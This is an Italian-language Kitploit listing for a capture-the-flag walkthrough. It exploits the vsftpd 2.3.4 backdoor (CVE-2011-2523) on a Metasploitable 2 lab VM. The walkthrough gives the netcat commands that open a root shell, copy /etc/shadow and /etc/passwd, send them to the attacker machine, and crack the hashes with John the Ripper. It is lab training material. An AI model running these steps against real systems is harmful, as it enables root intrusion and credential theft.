Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CTF---CVE-2011-2523 — Walkthrough CTF passo-passo che sfrutta il backdoor vsftpd 2.3.4 (CVE-2011-2523) per catturare e decifrare /etc/shadow e /etc/passwd da Metasploitable 2. | Kitploit
Strumenti/GitHubGitHub/xiangsi-howard/ctf---cve-2011-2523
Password CrackingRicognizioneAnalisi delle VulnerabilitàExploitRaccolta InformazioniCTFPenetration TestingApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
xiangsi-howard/ctf---cve-2011-2523

CTF---CVE-2011-2523

Walkthrough CTF passo-passo che sfrutta il backdoor vsftpd 2.3.4 (CVE-2011-2523) per catturare e decifrare /etc/shadow e /etc/passwd da Metasploitable 2.

Vedi Repository
43 anni faNon ancora revisionato

Scenario Cattura la Bandiera - CVE-2011-2523

Cattura il file decifrato /etc/shadow e /etc/passwd dal server vulnerabile Metasploitable 2.

Configurazione dell'ambiente

Passo 1: Scarica e decomprimi la macchina virtuale

Per questo CTF, eseguiamo VMware Workstation Pro con due macchine virtuali. Utilizziamo Kali Linux come macchina dell'attaccante e Metasploitable 2 come macchina vulnerabile.

  • Scarica e installa VMware Workstation: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
  • Scarica ed estrai la macchina virtuale Kali Linux: https://www.kali.org/get-kali/
  • Scarica ed estrai la macchina virtuale Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

Passo 2: Apri le macchine virtuali Kali Linux e Metasploitable 2 in VMware dal file estratto

  • Scegli l'opzione Open a Virtual Machine in VMware Workstation e seleziona il file Kali Linux decompresso
  • Fai clic destro sulla barra laterale e seleziona l'opzione open, quindi seleziona il file Metasploitable 2 decompresso
  • Premi il pulsante Play virtual machine su entrambe le macchine virtuali
  • Quando richiesto di selezionare l'opzione I moved It o I copied It, seleziona l'opzione I copied It

Passo 3: Accesso

  • Accedi a Kali Linux usando kali come nome utente e password
  • Accedi a Metasploitable usando msfadmin come nome utente e password

Passo 4: Registra l'indirizzo IP della macchina virtuale Metasploitable

  • Esegui ip addr show e registra l'indirizzo IP della sezione inet

Soluzione

Il Massachusetts Institute of Technology Research and Engineering descrive CVE-2011-2523 come una vulnerabilità ed esposizione comune in cui vsftpd 2.3.4 scaricato tra il 20110630 e il 20110703 contiene una backdoor che apre una shell sulla porta 6200/tcp.

Passo 1: Cerca porte aperte sulla macchina Metasploitable usando il servizio FTP

  • nmap <vulnerable-machine-ip-address>
  • La scansione nmap dovrebbe mostrare una porta aperta sulla porta 21 usando il servizio ftp

Passo 2: Prova a fare NetCat sulla porta aperta

  • nc <vulnerable-machine-ip-address> 21
  • Il nome utente è una qualsiasi stringa con :) alla fine, inserisci user <string>:)
  • Quando richiesto di inserire una password, inserisci una qualsiasi stringa pass <string>
  • Poi esci dalla connessione usando ^C [CTRL + C], una shell con privilegi di root su Metasploitable è stata aperta sulla porta 6200.

Passo 3: Connettiti alla shell sulla porta 6200 della macchina vulnerabile

  • nc -v <vulnerable-machine-ip-address> 6200
  • Mostra l'indirizzo IP della connessione attuale ip addr show
  • Mostra che l'accesso root è stato concesso usando whoami

Passo 4: Copia i file /etc/shadow e /etc/passwd in un altro file

  • cp /etc/shadow shadow.txt
  • cp /etc/passwd passwd.txt

Passo 5: Invia i file copiati alla macchina Kali Linux usando NetCat

  • Sulla macchina attaccante, cerca l'indirizzo IP nella sezione inet usando il comando ip addr show
  • Ascolta i file usando nc -l -p 1234 > shadow.txt sulla macchina attaccante
  • Nella shell root su Metasploitable nc -w 3 <destination-ip> 1234 < shadow.txt
  • Ripeti per il file passwd

Passo 5: Formatta il file shadow nel formato dello strumento John

  • unshadow passwd.txt shadow.txt > unshadowed-input
  • Osserva il file usando cat unshadowed-input, dovrebbe contenere nome utente e password memorizzati

Passo 6: Decifra il file shadow usando il comando John e la wordlist

  • Utilizza la wordlist rockyou.txt per craccare gli hash usando john
  • Decomprimi il file della wordlist su Kali Linux usando sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
  • Quando viene chiesto una password, usa la password amministratore predefinita per Kali Linux kali
  • Decifra le password usando john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt
  • Visualizza le password craccate john –show unshadowed-input
Scarica lo strumento